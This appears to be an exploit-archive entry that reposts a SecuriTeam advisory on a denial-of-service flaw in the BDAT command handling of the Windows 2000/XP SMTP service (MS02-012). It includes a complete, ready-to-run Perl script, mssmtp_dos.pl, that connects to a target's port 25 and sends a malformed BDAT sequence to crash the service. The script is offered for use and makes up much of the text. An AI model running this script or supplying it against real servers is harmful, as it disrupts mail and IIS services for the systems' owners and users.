Windows_SMTP_Service_Malformed_Data_Transfer_Request_bug

perlish

From:http://www.securiteam.com/windowsntfocus/5XP0L2A6AS.html \r\n\r\nSummary : \r\nAn SMTP service installs by default as part of Windows 2000 server products.  \r\nExchange 2000, which can only be installed on Windows 2000, uses the native  \r\nWindows 2000 SMTP service rather than providing its own. In addition, Windows  \r\n2000 and Windows XP workstation products provide an SMTP service that is not  \r\ninstalled by default. All of these implementations contain a flaw that could  \r\nenable denial of service attacks to be mounted against the service.  \r\n\r\nThe flaw involves how the service handles a particular type of SMTP command  \r\nused to transfer the data that constitutes an incoming mail. By sending a  \r\nmalformed version of this command, an attacker could cause the SMTP service to  \r\nfail. This would have the effect of disrupting mail services on the affected  \r\nsystem, but would not cause the operating system itself to fail. \r\n\r\n\r\nexploit: \r\n#----Begin---- \r\n#!/usr/bin/perl -w \r\n################## \r\n# \r\n# \r\n# URL: http://www.digitaloffense.net/ \r\n# EMAIL: hdm@digitaloffense.net \r\n# USAGE: ./mssmtp_dos.pl <target ip> \r\n# \r\n# Summary: \r\n# \r\n# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a \r\n# Denial of Service attack through the BDAT command. If exploited, this \r\n# vulnerability will cause any and all services running under IIS (the \r\n# inetinfo.exe process) to become unavailable. \r\n# \r\n# \r\n# Solution:  \r\n#  \r\n# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp \r\n# \r\n\r\nuse IO::Socket; \r\n     \r\n$target = shift() || \"127.0.0.1\"; \r\nmy $port = 25; \r\nmy $rcpt = \"Administrator\"; \r\nmy $from = \"crash\\@burn.com\"; \r\n\r\nmy $sock = IO::Socket::INET->new ( \r\n                                    PeerAddr => $target, \r\n                                    PeerPort => $port, \r\n                                    Proto => \'tcp\' \r\n                                 ) || die \"could not connect: $!\"; \r\n\r\nmy $banner = <$sock>; \r\nif ($banner !~ /^2.*/) \r\n{ \r\n    print STDERR \"Error: invalid server response \'$banner\'.\\n\"; \r\n    exit(1); \r\n} \r\n\r\nprint $sock \"HELO $target\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"MAIL FROM: $from\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"RCPT TO: $rcpt\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"BDAT 4\\r\\n\"; \r\nprint $sock \"b00mAUTH LOGIN\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"\\r\\n\"; \r\nprint $sock \"\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\"; \r\n\r\nclose($sock); \r\n#----End---- \r\n  \r\n Additional information  \r\nThe information has been provided by H D MooreA.  \r\n\r\n  \r\n